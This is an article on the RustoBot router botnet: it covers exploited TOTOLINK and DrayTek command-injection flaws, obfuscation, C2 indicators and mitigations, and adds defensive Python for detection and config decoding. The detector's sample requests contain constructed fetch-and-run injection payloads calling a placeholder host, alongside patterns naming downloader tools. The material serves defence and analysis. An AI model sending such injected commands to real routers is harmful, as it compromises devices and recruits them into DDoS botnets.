A newly identified botnet, named RustoBot, is targeting vulnerable routers worldwide. The malware, written in Rust, exploits command-injection vulnerabilities in specific TOTOLINK and DrayTek router models to run attacker-supplied commands on the device. Infections have been observed mainly in Japan, Taiwan, Vietnam, and Mexico, with the technology sector among those affected.
Targeted Router Models and Vulnerabilities
RustoBot primarily focuses on the following TOTOLINK router models:
– N600R
– A830R
– A3100R
– A950RG
– A800R
– A3000RU
– A810R
The exploited flaws lie in `cstecgi.cgi`, the CGI handler that processes user input and administrative commands in the routers' web interface. Attacker-controlled parameters reach the system shell unsanitized, so a crafted request injects arbitrary OS commands and runs them on the device.
RustoBot also targets DrayTek Vigor2960 and Vigor300B routers through CVE-2024-12987, an OS command injection in the `cgi-bin/mainfunction.cgi/apmcfgupload` interface that likewise lets an attacker execute arbitrary commands on the router.
Exploitation Techniques
Exploitation begins with a crafted HTTP request to the vulnerable endpoint. Against TOTOLINK devices, the request to `cstecgi.cgi` carries an injected shell command that uses `wget` to fetch the malware binary built for the router's CPU architecture and then executes it.
RustoBot is distributed as separate builds for arm5, arm6, arm7, mips, and mpsl (little-endian MIPS), so the same injected command works across the range of SoCs found in consumer and small-office routers and other embedded devices, which widens the botnet's reach considerably.
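As an added example (not code from the report, the vendors, or the malware), here is a Python detector for exploitation attempts of this kind: it inspects HTTP requests to the two vulnerable endpoints named above and flags those carrying the shell syntax and download tools that an injected fetch-and-run command needs. The sample requests are constructed; the JSON field and query parameter names, and the 203.0.113.10 payload host, are placeholders rather than the real vulnerable parameters.

```python
import re
from urllib.parse import unquote_plus

# Endpoints the report names as the exploited attack surface.
VULN_ENDPOINTS = {
    "/cgi-bin/cstecgi.cgi": "TOTOLINK cstecgi.cgi",
    "/cgi-bin/mainfunction.cgi/apmcfgupload": "DrayTek apmcfgupload (CVE-2024-12987)",
}

# Generic markers of an injected "fetch and run" command. These are not
# RustoBot's actual payload string; they are the shell syntax and tools any
# such payload needs.
INJECTION_PATTERNS = [
    (re.compile(r"[;|`]|\$\("), "shell metacharacter"),
    (re.compile(r"\b(wget|curl|tftp|ftpget)\b"), "downloader command"),
    (re.compile(r"\bchmod\b"), "permission change"),
    (re.compile(r"/tmp/|/var/tmp/|/dev/shm/"), "writable staging path"),
]


def inspect_request(method, uri, body=""):
    """Inspect one HTTP request (path, query and, if available, body).

    Returns (endpoint_label, [matched_markers]) when the request targets a
    known-vulnerable endpoint and carries injection markers, else None.
    """
    path = uri.split("?", 1)[0]
    if path not in VULN_ENDPOINTS:
        return None
    # Undo %-encoding and '+' so the patterns see what the CGI would see.
    text = unquote_plus(uri) + "\n" + unquote_plus(body)
    hits = [label for pattern, label in INJECTION_PATTERNS if pattern.search(text)]
    return (VULN_ENDPOINTS[path], hits) if hits else None


def scan(requests):
    """Run inspect_request over (method, uri, body) tuples; return the hits."""
    findings = []
    for method, uri, body in requests:
        result = inspect_request(method, uri, body)
        if result:
            findings.append((method, uri.split("?", 1)[0], *result))
    return findings


# Constructed sample traffic (not captured data). "param" is a placeholder
# name, not the real vulnerable parameter; 203.0.113.10 is a documentation
# address standing in for the payload server.
SAMPLE_REQUESTS = [
    ("POST", "/cgi-bin/cstecgi.cgi",
     '{"param":"`wget http://203.0.113.10/x.sh -O /tmp/x.sh; sh /tmp/x.sh`"}'),
    ("GET", "/cgi-bin/mainfunction.cgi/apmcfgupload"
            "?param=%3Bwget+http%3A%2F%2F203.0.113.10%2Fx+-O+%2Ftmp%2Fx%3B", ""),
    ("POST", "/cgi-bin/cstecgi.cgi", '{"param":"status"}'),   # legitimate admin call
    ("GET", "/index.html", ""),
]

if __name__ == "__main__":
    for method, path, endpoint, hits in scan(SAMPLE_REQUESTS):
        print(f"ALERT {endpoint}: {method} {path} -> {', '.join(hits)}")
```

Plain access logs usually omit POST bodies, so feed this from a WAF, a reverse proxy, or requests reconstructed from a packet capture. A request to `cstecgi.cgi` by itself is not an indicator, since the same handler serves legitimate administration; the injection markers are what matter.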
Advanced Operational Techniques
RustoBot uses several techniques to keep running and to resist analysis:
– API Function Retrieval: instead of calling system functions through ordinary imports, the malware resolves their addresses at runtime by reading the Global Offset Table (GOT), which makes the functions it depends on harder to see in a static listing.
– Configuration Data Encoding: configuration data is stored XOR-encoded and decoded only when needed, so the values do not appear as plain strings in the binary. Simple XOR is not real encryption, but it defeats a quick `strings` pass and slows reverse engineering.
– Complex Instruction Sequences: the offset of the XOR key is computed through convoluted instruction sequences rather than stored as a constant, adding a further layer of obfuscation.
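As an added illustration (not code from the report or from the malware), the following Python shows how an analyst recovers XOR-encoded configuration of this kind when the key is not known: slide a known plaintext fragment (a crib, here ".anondns.net" from the C2 names) across the blob, derive the repeating key that fragment implies at each position, and keep the key whose full decode yields clean strings. The encoded blob is constructed for this demo with a single-byte key (0x5A); the real sample's key length and offset derivation are not described on this page, so the function tries key lengths 1 to 8 rather than assuming one.

```python
CRIB = b".anondns.net"  # fragment expected somewhere in the decoded config

# Constructed sample: two NUL-terminated strings XOR-encoded with the
# single-byte key 0x5A. Not bytes carved from a real RustoBot sample.
ENCODED_CONFIG = bytes.fromhex(
    "3e2c28323f362a3f28743b3435343e342974343f2e5a"
    "282f292e38352e743b3435343e342974343f2e5a"
)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR `data` with a repeating `key`; the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_config(plain: bytes) -> bool:
    """A decoded string table should be printable ASCII plus NUL separators."""
    return all(b == 0 or 0x20 <= b < 0x7F for b in plain)


def recover_key(blob: bytes, crib: bytes = CRIB, max_len: int = 8):
    """Crib-drag a repeating-key XOR blob.

    For every candidate key length and every position the crib could occupy,
    derive the key bytes the crib implies, reject positions where two crib
    bytes demand different values for the same key slot, and accept the first
    key whose full decode looks like a string table.
    Returns (key, plaintext) or None.
    """
    for key_len in range(1, max_len + 1):
        for off in range(len(blob) - len(crib) + 1):
            key = [None] * key_len
            consistent = True
            for i, c in enumerate(crib):
                slot = (off + i) % key_len
                k = blob[off + i] ^ c
                if key[slot] is None:
                    key[slot] = k
                elif key[slot] != k:
                    consistent = False
                    break
            if not consistent or None in key:
                continue
            plain = xor_bytes(blob, bytes(key))
            if looks_like_config(plain):
                return bytes(key), plain
    return None


def parse_config(plain: bytes):
    """Split a decoded NUL-separated string table into Python strings."""
    return [s.decode("ascii") for s in plain.split(b"\x00") if s]


if __name__ == "__main__":
    found = recover_key(ENCODED_CONFIG)
    if found:
        key, plain = found
        print("key:", key.hex(), "config:", parse_config(plain))
```

The crib test is what makes this practical against a real dump: a 42-byte blob and a 12-byte crib give only a handful of consistent candidates, and the printable-ASCII filter discards the coincidental ones. For a sample whose key is derived at runtime, as the report describes, the recovered key also tells you which constant the obfuscated instruction sequence is computing.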
Command and Control Infrastructure
Once established on a compromised device, RustoBot connects to its command and control (C2) infrastructure by resolving domains such as:
– dvrhelper.anondns.net
– techsupport.anondns.net
– rustbot.anondns.net
– miraisucks.anondns.net
All four names resolved to the same IP address, 5.255.125.150, so multiple domains front a single C2 server. Once connected, the bot waits for commands that specify the DDoS attack type and target. Both the domain names and the address are useful as indicators of compromise, but note that the operator can re-point the names to a new address at any time.
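As an added example (not from the report), the following Python runs the C2 indicators above over DNS resolver logs. The log lines are constructed in a simple whitespace-separated layout; real resolvers log differently, so only the parsing needs adapting. The scenario assumes 192.168.1.1 is the router and that it forwards lookups to an internal resolver that logs the querying address: because the bot runs on the router itself, its lookups originate from the gateway address rather than from a LAN client.

```python
from ipaddress import ip_address

# Indicators from the report.
C2_DOMAINS = {
    "dvrhelper.anondns.net",
    "techsupport.anondns.net",
    "rustbot.anondns.net",
    "miraisucks.anondns.net",
}
C2_IP = ip_address("5.255.125.150")

# Constructed log lines (not real data) in a "timestamp client qname qtype
# answer" layout. 192.168.1.1 is assumed to be the router itself.
SAMPLE_DNS_LOG = """\
2025-04-20T10:01:02Z 192.168.1.50 www.example.com A 93.184.216.34
2025-04-20T10:01:07Z 192.168.1.1 rustbot.anondns.net A 5.255.125.150
2025-04-20T10:01:09Z 192.168.1.1 techsupport.anondns.net A 5.255.125.150
2025-04-20T10:02:11Z 192.168.1.77 updates.example.org A 203.0.113.5
2025-04-20T10:03:15Z 192.168.1.1 other-host.example.net A 5.255.125.150
garbage line that should be skipped by the parser
"""


def classify(qname, answer):
    """Return why a lookup is suspicious, or None if it is not."""
    if qname.lower().rstrip(".") in C2_DOMAINS:
        return "known C2 domain"
    try:
        # Catches a new name the operator points at the same server.
        if ip_address(answer) == C2_IP:
            return "resolves to C2 IP"
    except ValueError:  # NXDOMAIN, CNAME target, or other non-address answer
        pass
    return None


def check_dns_log(text):
    """Parse the log and return one finding per suspicious lookup."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # malformed or foreign line; skip rather than crash
        ts, client, qname, _qtype, answer = parts
        reason = classify(qname, answer)
        if reason:
            findings.append({"ts": ts, "client": client, "qname": qname, "reason": reason})
    return findings


def suspect_hosts(findings):
    """Group findings by source address so the infected device stands out."""
    hosts = {}
    for f in findings:
        hosts.setdefault(f["client"], set()).add(f["qname"])
    return hosts


if __name__ == "__main__":
    for client, names in suspect_hosts(check_dns_log(SAMPLE_DNS_LOG)).items():
        print(f"{client}: {sorted(names)}")
```

Matching on the answer address as well as the name is what catches the third hit, a name not on the list but pointed at the same server. Since the queries come from the gateway, a hit against the router's own address is a strong sign the router, not a client behind it, is the infected device.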
DDoS Attack Capabilities
RustoBot supports several DDoS attack types, with UDP flooding the most prominent. In this attack the bot sends a high volume of UDP packets, each carrying a 1400-byte payload (close to the largest payload that fits in a standard 1500-byte Ethernet frame without IP fragmentation), to the target IP address and port named in the C2 command. Many bots doing this at once saturate the victim's uplink and cause sustained service disruption.
Implications and Recommendations
The emergence of RustoBot underscores how widespread unpatched vulnerabilities remain in Internet of Things (IoT) and network devices. The choice of Rust, which offers memory safety and straightforward cross-compilation to the embedded architectures listed above, points to botnet authors moving toward more stable, portable malware.
To mitigate the risks associated with RustoBot and similar threats, it is recommended that users and organizations:
– Update Firmware Regularly: apply vendor firmware updates promptly, including any TOTOLINK and DrayTek updates that address the flaws above, and replace devices that no longer receive security updates.
– Change Default Credentials: replace default usernames and passwords with strong, unique credentials to block opportunistic logins.
– Disable Unnecessary Services: turn off features not in use, above all remote administration reachable from the WAN, since the exploited endpoints are part of the router's web interface.
– Monitor Network Traffic: watch for DNS lookups of the C2 domains above, connections to 5.255.125.150, and sudden outbound UDP floods originating from the router itself.
– Isolate IoT Devices: place IoT devices on separate network segments so that a compromised device cannot reach critical systems.
Applied together, these measures raise the cost of compromise and shorten the time to detect threats like RustoBot.